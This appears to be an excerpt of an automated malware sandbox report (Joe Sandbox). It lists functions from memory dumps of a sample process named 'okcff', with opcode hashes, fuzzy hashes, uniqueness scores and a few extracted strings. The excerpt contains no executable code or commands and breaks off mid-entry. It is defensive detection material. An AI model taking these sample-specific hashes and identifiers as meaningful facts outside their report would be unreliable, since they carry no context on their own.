                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1d50ecda905a183b4cebaf316ad414d112295698ecbaf786421e35c69b8b7214
                                                            • Instruction ID: 0992e112a8cc9c403025cc48f7333b43760009aad6f5e2ca7b225a66a72fbd3c
                                                            • Opcode Fuzzy Hash: 1d50ecda905a183b4cebaf316ad414d112295698ecbaf786421e35c69b8b7214
                                                            • Instruction Fuzzy Hash: AFD05E6294D3A50EE71242707C996B93F754B22200F0904FBE84ADA993E08684198612
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218113B, Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6beeee8c3dced85e26824fdeb40bb992c4ada5de7075f593e1fac208188b5d22
                                                            • Instruction ID: 00df1a33dc98ba47ad44b3bd55a6b24cd23a0c775c45f69709d39e23cfabad5e
                                                            • Opcode Fuzzy Hash: 6beeee8c3dced85e26824fdeb40bb992c4ada5de7075f593e1fac208188b5d22
                                                            • Instruction Fuzzy Hash: E2D0A73604D3C49FC706173048896B47F344B03300B0904D6E06E8B663C6265557CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211B348, Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ea1e89171912e9c1cfe8a6958cec3bb663e7b654f4c5224958b07e6a0edcecf
                                                            • Instruction ID: c3e59c74a0913de6f88b21a8827bc8c67fba6a7315c90c2dae04b807053938ca
                                                            • Opcode Fuzzy Hash: 3ea1e89171912e9c1cfe8a6958cec3bb663e7b654f4c5224958b07e6a0edcecf
                                                            • Instruction Fuzzy Hash: 1EC01222B40A3827CA0172AA7809BAE328D8B819A0F800026FA0C8B281DD259D4243DA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211EB63, Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40aa4210c81b60a7c1823fc363cc4fd3c996cf7592c130999380d3c7a0828565
                                                            • Instruction ID: a0fb550a977422279319a8ad0100bbb00a0d54d99f9c00295c008b8499d41ba0
                                                            • Opcode Fuzzy Hash: 40aa4210c81b60a7c1823fc363cc4fd3c996cf7592c130999380d3c7a0828565
                                                            • Instruction Fuzzy Hash: ACD09E3058E3C08FC32E47B86C65AB03F706B53215B0945EBD497495A687354552D649
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542D0C8, Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf1029c1b601053ff03911dea13fb10653563e21eec92deffd7c06f047360b38
                                                            • Instruction ID: f6159ce6e4872b9365148f95e47f0f499135eb236a4fdf5f09a7e31f8ad5c2da
                                                            • Opcode Fuzzy Hash: bf1029c1b601053ff03911dea13fb10653563e21eec92deffd7c06f047360b38
                                                            • Instruction Fuzzy Hash: 2AD01231C0D038D78604DE409804DFA3E279B1030DFC0C003B547858718A3189A3D793
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542EF18, Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a00fc8da81d3aa576bff82ae6be34c978a91a664de78291d55560b611c73b9ee
                                                            • Instruction ID: 1bb2a289f7c58de542dad7a6b54428c97daf5d8ab398f793f238ce202a3be7e5
                                                            • Opcode Fuzzy Hash: a00fc8da81d3aa576bff82ae6be34c978a91a664de78291d55560b611c73b9ee
                                                            • Instruction Fuzzy Hash: BBC08C3321C134A70120A14A64004F9728F95444342C3101BB00E4B60EEF81BC2302C6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218F5C8, Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9fa9824017d240ac32864f09d2b719a462669043edcfcf29584ca43bd350bcc
                                                            • Instruction ID: 0705235babf196f3d7f477ee5ea806e53f878cf92ea632bd20a40c63e6de0f9e
                                                            • Opcode Fuzzy Hash: e9fa9824017d240ac32864f09d2b719a462669043edcfcf29584ca43bd350bcc
                                                            • Instruction Fuzzy Hash: FFD0C7751592C09FCB528F78D4D48D03FB09F5B61035940D7F4858F637C2229D15D741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02115510, Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e208d4848148ca000dbf3715019a7af01a313cce16f4d6bf218ff5a5af2a025f
                                                            • Instruction ID: c3bc44d162e83531819868a738fead660d1898979db598f34a80b6765dd01e75
                                                            • Opcode Fuzzy Hash: e208d4848148ca000dbf3715019a7af01a313cce16f4d6bf218ff5a5af2a025f
                                                            • Instruction Fuzzy Hash: 36D09E39A01008EBCB04DF84E5419DDF772FB84325F10C05BDD1567350C7329A16CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02114C18, Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6463b58dd80cf4f4e8d67acce2cfbeb50bbe30a719322513715f59f9e7c6eb97
                                                            • Instruction ID: 9adc9ec343dca6a9417f2739272103dbf0ec150fcf4e673de74485a3fbb1d0f1
                                                            • Opcode Fuzzy Hash: 6463b58dd80cf4f4e8d67acce2cfbeb50bbe30a719322513715f59f9e7c6eb97
                                                            • Instruction Fuzzy Hash: D9D0C935B002088FCF00DB94E9854DDF772FB85325F204021D50A97218CB305D19CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05428CA0, Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f7827eebcfe19d056438bd3561ba22930c1d122f165e0f00e7ee86645a92d07
                                                            • Instruction ID: 7e3ac3d986e85420e858881e8252b4a0dfd3ac753a79e40d6941469f62486e49
                                                            • Opcode Fuzzy Hash: 8f7827eebcfe19d056438bd3561ba22930c1d122f165e0f00e7ee86645a92d07
                                                            • Instruction Fuzzy Hash: 55D0923444E7D49FC70287710CB4A847F316F53202B0A88CB98869A1A3825A1458EB27
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211EB70, Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c36d589d59fc58c6ba8a4b6444be5c207528a8d8fbbd87d253fcfb9d775e7c06
                                                            • Instruction ID: 9e94c10f78cfa9b61ec8bfe3ddd10850074308ccbb12ab8208b31100f330fa55
                                                            • Opcode Fuzzy Hash: c36d589d59fc58c6ba8a4b6444be5c207528a8d8fbbd87d253fcfb9d775e7c06
                                                            • Instruction Fuzzy Hash: C8C02B300CA304CFC22C02F06C09F3032B82380315F018031E81B046B04F318452C049
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02181148, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 340c47c20dce054923a684f76aeefc26df557a1135ca4e863321aafd45e2b828
                                                            • Instruction ID: 00631c68f953ff5ce785cf6a3bbef234868b8c5208da6810c70cef566a574253
                                                            • Opcode Fuzzy Hash: 340c47c20dce054923a684f76aeefc26df557a1135ca4e863321aafd45e2b828
                                                            • Instruction Fuzzy Hash: D9C09B361CD244D7CA1C367054C5B75761D5751705F164065E13F45B148B77D493CEC6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02118360, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37909ec34418410f0ad4218d0b37e15491f79d353385c626bf7190e36416d8d9
                                                            • Instruction ID: 0c51eaa53054958c77382dadda63118023907af0094fe91dacf3cf9632d28faf
                                                            • Opcode Fuzzy Hash: 37909ec34418410f0ad4218d0b37e15491f79d353385c626bf7190e36416d8d9
                                                            • Instruction Fuzzy Hash: 85C092350EDF88CEAA1D2669AC4AC3B36386600B0E76BC276A13B4856457B2D990C547
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211C3C8, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4759f95e2f89a17459e40ef36f73a0fb7ac718213160c60feb6395b7ce744b43
                                                            • Instruction ID: d1a0ae81813fc86a3ab599881f2d1b31882c7c89e2deb283aaefc8ab257bdbbf
                                                            • Opcode Fuzzy Hash: 4759f95e2f89a17459e40ef36f73a0fb7ac718213160c60feb6395b7ce744b43
                                                            • Instruction Fuzzy Hash: C4B092311EC608CAC62D2161500863F721D9780208F92047B902B09E5147B69462CAEF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02113EC0, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ae4f2f672efb8708bbf5a105ef7aa150d02ae4fdcc002c60067f070cfa3a9fb
                                                            • Instruction ID: 48f242d87a91cca6e6b025d40024eb8c60bf603efb65adc63a1cb85bf773826e
                                                            • Opcode Fuzzy Hash: 0ae4f2f672efb8708bbf5a105ef7aa150d02ae4fdcc002c60067f070cfa3a9fb
                                                            • Instruction Fuzzy Hash: 2BC0481A50E7C60ED703AAA05D61A806F326813518B8D05C3E084EA253E90C8E8A8BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211DCD0, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 022f810b0cef1319b1f13900cc10885607ff5bc8fef74af43ea900dcb345daa0
                                                            • Instruction ID: 8da4a6259e83117cbcc747fde4ae2bb087e24410764aa55c958ef6df1aa260d3
                                                            • Opcode Fuzzy Hash: 022f810b0cef1319b1f13900cc10885607ff5bc8fef74af43ea900dcb345daa0
                                                            • Instruction Fuzzy Hash: 11C0927408CA2CCA820C5B717D09A393B29B6E1216702487E902B4AD208BB2E4A2E681
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05429541, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 185f7e37731184d5ae70be23fc648e295af29308920022777be819d23cfd6d80
                                                            • Instruction ID: c4c3d43cb44b424f10842fb9970912f9c8b2876faf6d627eaa22c445cc22421f
                                                            • Opcode Fuzzy Hash: 185f7e37731184d5ae70be23fc648e295af29308920022777be819d23cfd6d80
                                                            • Instruction Fuzzy Hash: FAC04C5090FBD25FDB2397709D7A148BF716C5310130D96CFC481CE5A3D6144545D757
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05428B02, Relevance: .0, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 846fb5bca6410ebf83133d7d1208cb631dee6694f99f8349a84ed090fdf5745d
                                                            • Instruction ID: ed15d6b53cfa39832c76963aa5e3d488b947712bb67df8b4ae519ee0470abbcd
                                                            • Opcode Fuzzy Hash: 846fb5bca6410ebf83133d7d1208cb631dee6694f99f8349a84ed090fdf5745d
                                                            • Instruction Fuzzy Hash: 17C0481180E6D28FEB029B7048BA6943F72590320270988E68091CA0A3C049088ADB22
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218F5D8, Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542B218, Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d20f650a9595bc73473dbf626f7a6ec3d7177d33c54e5354336fdc9fb3fa596
                                                            • Instruction ID: 6d5cdb3b46ed564f374bba720a02339f4408e77a6e82e3270c1d17a570700515
                                                            • Opcode Fuzzy Hash: 5d20f650a9595bc73473dbf626f7a6ec3d7177d33c54e5354336fdc9fb3fa596
                                                            • Instruction Fuzzy Hash: 9DB012312043190A174017B27C08637339DA5004043809471E50ED0A00F905D0104450
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542D695, Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56947c4b9a289f3faac098bf2a790aa9111f929ea5a4bb69b351bda6d76158ec
                                                            • Instruction ID: d05f1043a9b7d79563650bef346e2790c73c7b78faeb6d81be0c63a389adce14
                                                            • Opcode Fuzzy Hash: 56947c4b9a289f3faac098bf2a790aa9111f929ea5a4bb69b351bda6d76158ec
                                                            • Instruction Fuzzy Hash: FAB09237A05009CB8B00DB84F886CDCF774EB94226B104067D211A242087325A69CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0542078A, Relevance: 335.8, Strings: 263, Instructions: 7064COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {=$ |=$ }=$0{=$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$H$o$P{=$P|=$#i[m^$#j[m^$#k[m^$#p[m^$+e[m^$+f[m^$+g[m^$3c[m^$3i[m^$3l[m^$3n[m^$3o[m^$3p[m^$;e[m^$;f[m^$;h[m^$Cc[m^$Ci[m^$Cj[m^$Cl[m^$Cn[m^$Co[m^$Cp[m^$Kg[m^$Sd[m^$Si[m^$Sj[m^$Sk[m^$Sl[m^$Sn[m^$[e[m^$[f[m^$[h[m^$cc[m^$cd[m^$ck[m^$cl[m^$cn[m^$co[m^$cp[m^$kf[m^$kg[m^$kh[m^$sc[m^$si[m^$sj[m^$sk[m^$sl[m^$sn[m^$so[m^${=${f[m^${g[m^$|=$~=$c[m^$e[m^$f[m^$j[m^$l[m^$n[m^
                                                            • API String ID: 0-3425778499
                                                            • Opcode ID: 9fd0db56c6cce30892b64657bcf1925f86c51da4224458d140d2ebac92a3eea2
                                                            • Instruction ID: 574c3d6cb40393c09b04e97261565d68f840ef46a12a2c6ebf7d752aa078f126
                                                            • Opcode Fuzzy Hash: 9fd0db56c6cce30892b64657bcf1925f86c51da4224458d140d2ebac92a3eea2
                                                            • Instruction Fuzzy Hash: AF041331D1061A8BCF15EF60CD549E9B772FF99300F1196A6E9097B224EB706B89CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 003D4D79, Relevance: 17.3, Strings: 12, Instructions: 2266COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: yR$#%f$#fr$*T:O$Cvr&$Methods Assembly$T3i$[Yp{$]V|N$sJ!g$vtFp$i
                                                            • API String ID: 0-2312584447
                                                            • Opcode ID: 104f7408cfed895c77dcc76d57f3db0caacf19e6f05041ec79f2e2e58167115c
                                                            • Instruction ID: 0311a7d50232a0d35a53ef363ab2615bb63f4016806807dba23621958f9eb015
                                                            • Opcode Fuzzy Hash: 104f7408cfed895c77dcc76d57f3db0caacf19e6f05041ec79f2e2e58167115c
                                                            • Instruction Fuzzy Hash: D843D231D5072B8ADB119F608C44AC9F372FFA6304F219785A9493B145EBB16BDACF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02110940, Relevance: 2.3, Strings: 1, Instructions: 1007COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: 7f349db6f8ac2ebb24cab632806636d2ea2c45833cec5adc7e1518fadd371c36
                                                            • Instruction ID: 9609b8907129f1802fd81eb8c2f2f129e6d5fa085ee7b973526ef89c1f94b818
                                                            • Opcode Fuzzy Hash: 7f349db6f8ac2ebb24cab632806636d2ea2c45833cec5adc7e1518fadd371c36
                                                            • Instruction Fuzzy Hash: 8A822C71E442199FCB14CF99C884AAEF7F2BF88310F1A8166E919EB355D7359C81CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02110E00, Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: e7b755c9ac4f41503106f15a91cf56b3bb65b7e38374180c9f692f4100dfe2ab
                                                            • Instruction ID: fe6edd46b787e8c6df7e0243e6aed60be0ee0e8d45509c3cf601658917293849
                                                            • Opcode Fuzzy Hash: e7b755c9ac4f41503106f15a91cf56b3bb65b7e38374180c9f692f4100dfe2ab
                                                            • Instruction Fuzzy Hash: EB022B31E442199FCB14CF99C884AAEFBF2EF88310F1A8566E919EB351D7349C41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02185C80, Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: 80de35fc3b9e13331aebccd35c11441378605b0d4e0202f78ac723a3fa492fcc
                                                            • Instruction ID: dcab64322ee9c13c343cf86baec2983abeeaaea0cee4cca403be532a24cfee76
                                                            • Opcode Fuzzy Hash: 80de35fc3b9e13331aebccd35c11441378605b0d4e0202f78ac723a3fa492fcc
                                                            • Instruction Fuzzy Hash: 22D11734A406049FCB14EF68C5C4AAAB7F6EF88705F6684A9E9159B361DB31EC42CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02189022, Relevance: .6, Instructions: 577COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64443d776efa9b83bd622ee4b2d0eeb4d16229c1b9456890c20790a948f58c3f
                                                            • Instruction ID: d079b49505592174000df7e93c63248aff76e6b15e3bf3f40649c11759433833
                                                            • Opcode Fuzzy Hash: 64443d776efa9b83bd622ee4b2d0eeb4d16229c1b9456890c20790a948f58c3f
                                                            • Instruction Fuzzy Hash: D22218347402048FDB18EF39D9D4AAA77F6AF89314B1584A9E916DB3A5DB30EC41CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542A807, Relevance: .3, Instructions: 339COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa60497bc428e71e0835fa36007af6e2c6aba52a1f8c5261535199c7a95b319
                                                            • Instruction ID: c11dd5627f70de3accce2685a3669a8d479612c3c70cce9a60c2cd74d2d1a324
                                                            • Opcode Fuzzy Hash: dfa60497bc428e71e0835fa36007af6e2c6aba52a1f8c5261535199c7a95b319
                                                            • Instruction Fuzzy Hash: 47E18130E042398FCB14CFAAC980AEDBBF2BF84304F59C5AAD459AB255D7749985CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542A8F2, Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21b1f08847d8447906a1a23655229167207fb5aa961a6cfd2d087548867eae71
                                                            • Instruction ID: b862d7f2fc5387a3983e7839757cda5da4ef7d57c007823026a1ae3576ffd6b1
